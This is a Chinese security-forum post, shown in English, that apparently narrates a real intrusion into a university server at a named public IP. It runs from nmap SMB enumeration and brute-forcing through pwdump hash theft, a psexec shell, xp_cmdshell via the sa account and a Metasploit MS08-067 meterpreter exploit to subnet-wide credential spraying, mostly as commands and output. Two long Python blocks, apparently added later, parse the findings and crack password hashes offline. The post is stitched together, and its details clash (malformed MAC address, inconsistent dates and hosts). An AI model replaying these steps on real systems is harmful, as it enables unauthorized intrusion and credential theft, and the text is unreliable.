China Network Penetration Testing Alliance

Title: nmap+msf intrusion of Guangxi Normal University

Author: admin    Time: 2012-12-4 12:46

Guangxi Normal University site: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241    // use the script to enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241    // list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241    // obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the password hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
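The three NSE runs above (smb-enum-users, smb-enum-shares and smb-brute) each bury their findings under a full port listing. The following is an added example, not code from the original post or from nmap itself: it parses the "Host script results:" block of a nmap normal-output report and pulls out the facts that matter for the next step: the account list, which shares admit anonymous access, and which credentials logged in. The report text is constructed from this page's own output (a combined `--script` run prints all three blocks under one host); the function names `parse_host_scripts`, `triage` and `risk_notes` are chosen here.

```python
"""Triage nmap SMB host-script results: accounts, anonymously reachable shares, valid logins."""
import re

# Constructed sample: the three host-script blocks from the smb-enum-users, smb-enum-shares and
# smb-brute runs above, stitched into one report as a combined --script run would print them.
SAMPLE_REPORT = """\
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
"""


def parse_host_scripts(report):
    """Return {script_name: [stripped output lines]} from the 'Host script results:' block.

    NSE prints a header '| name:' per script, then that script's output with a '|' prefix;
    the last line of a script (or of the whole block) carries '|_' instead.
    """
    scripts, current, in_block = {}, None, False
    for line in report.splitlines():
        if line.startswith("Host script results:"):
            in_block = True
            continue
        if not in_block:
            continue
        if not line.startswith("|"):
            break                                    # e.g. 'Nmap done:' ends the block
        header = re.match(r"^\| ([\w-]+):$", line)
        if header:
            current = header.group(1)
            scripts[current] = []
        elif current is not None:
            body = line[2:] if line.startswith("|_") else line[1:]
            scripts[current].append(body.strip())
    return scripts


def triage(report):
    """Pull the security-relevant facts out of the parsed script output."""
    scripts = parse_host_scripts(report)
    findings = {"domain": None, "users": [], "anonymous_shares": {}, "logins": []}
    for line in scripts.get("smb-enum-users", []):
        m = re.match(r"Domain: ([^;]+); Users:\s*(.*)", line)
        if m:
            findings["domain"] = m.group(1)
            findings["users"] += [u.strip() for u in m.group(2).split(",") if u.strip()]
    share = None                                     # a share name precedes its access line
    for line in scripts.get("smb-enum-shares", []):
        m = re.match(r"Anonymous access: (.+)", line)
        if m is None:
            share = line
        elif share and m.group(1) != "<none>":
            findings["anonymous_shares"][share] = m.group(1)
    for line in scripts.get("smb-brute", []):
        m = re.match(r"(\S+):(\S+) => Login was successful", line)
        if m:
            findings["logins"].append((m.group(1), m.group(2)))
    return findings


def risk_notes(findings):
    """Turn findings into the one-line observations a report would carry."""
    notes = []
    for user, secret in findings["logins"]:
        notes.append(f"{user}: blank password" if secret == "<blank>"
                     else f"{user}: weak password {secret!r}")
    if "IPC$" in findings["anonymous_shares"]:
        notes.append("IPC$ allows anonymous (null-session) access; unauthenticated account "
                     "enumeration over SAMR/LSA depends on it")
    return notes


if __name__ == "__main__":
    found = triage(SAMPLE_REPORT)
    print(found)
    for note in risk_notes(found):
        print("-", note)
```

Feed it a file saved with `-oN` from a combined run and the output is the short list that drives the rest of the engagement: the null session explains why user enumeration worked without credentials, and the two successful logins are what the pwdump and psexec steps that follow rely on.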

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target for known vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use the MS08-067 module in msf to exploit the target

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >    // ctrl+z to background the session
Background session 2? [y/N]
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254    // use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful; a simple msf+nmap attack.
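The smb-pwdump output earlier and the last step above, which feeds the captured LM hash straight back into smb-brute as a "password", both rest on what the two hash columns mean. The example below is added here and is not from the original post, nmap or pwdump6: it parses the dump into the `user:rid:LM:NT:::` form that john and hashcat read, flags what the hashes reveal before any cracking (a blank password, an LM hash present, a password of at most seven characters when the second LM half is the empty-password block), and recomputes the NT hash (MD4 over UTF-16LE) to confirm `123456` for `test` without touching the network. The sample block is constructed from the page's output; the two empty-password hash constants are the well-known values; the pure-Python MD4 is included because hashlib's `md4` is missing on builds without OpenSSL's legacy provider. Function names are chosen here.

```python
"""Audit the smb-pwdump hashes and verify a password guess offline against the NT hash."""
import re
import struct

# Hashes of the empty password; pwdump6 prints 'NO PASSWORD***...' in their place.
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# Constructed sample: the smb-pwdump host-script block exactly as printed on this page.
SAMPLE_PWDUMP = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's 'md4' needs OpenSSL's legacy provider."""
    mask = 0xFFFFFFFF
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"                      # pad: 0x80, zeros to 56 mod 64, LE bit length
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                         # round 1
            a = rol((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                         # round 2
            k = (i % 4) * 4 + i // 4
            a = rol((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                         # round 3
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a = rol((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); the right-hand column of the dump."""
    return md4(password.encode("utf-16-le")).hex().upper()


def parse_pwdump(text):
    """Return [(user, rid, lm, nt)] from smb-pwdump lines; blank markers become the empty hashes."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"^\|_?\s*(\S+):(\d+) => ([^:]+):(.+)$", line)
        if m:
            user, rid, lm, nt = m.groups()
            lm = EMPTY_LM if lm.startswith("NO PASSWORD") else lm.upper()
            nt = EMPTY_NT if nt.startswith("NO PASSWORD") else nt.upper()
            entries.append((user, int(rid), lm, nt))
    return entries


def to_pwdump_lines(entries):
    """john/hashcat pwdump format: user:rid:LM:NT:::"""
    return [f"{u}:{r}:{lm}:{nt}:::" for u, r, lm, nt in entries]


def audit(entries):
    """Per-account weaknesses visible from the hashes alone, before any cracking."""
    report = {}
    for user, _rid, lm, nt in entries:
        flags = []
        if nt == EMPTY_NT:
            flags.append("blank-password")
        elif lm != EMPTY_LM:
            flags.append("lm-hash-stored")            # <=14 chars, upper-cased, two independent DES halves
            if lm.endswith(EMPTY_LM[16:]):
                flags.append("password<=7-chars")     # second half equals the empty-password half
        report[user] = flags
    return report


def check_guess(entries, user, guess):
    """Confirm a candidate password against the dumped NT hash, no network login needed."""
    nt = {u: n for u, _r, _l, n in entries}[user]
    return nt_hash(guess) == nt


if __name__ == "__main__":
    entries = parse_pwdump(SAMPLE_PWDUMP)
    print("\n".join(to_pwdump_lines(entries)))
    print(audit(entries))
    print("test:123456 matches NT hash:", check_guess(entries, "test", "123456"))
```

Run as a script it prints the pwdump lines and the per-account flags. `check_guess` confirms what the smb-brute result already showed, but offline: once hashes are in hand, every further guess is verified locally, and an account flagged `lm-hash-stored` is the one to crack first because the LM column gives the password's upper-cased form in two seven-character pieces.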

* u2 L3 ]' B- k. {




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2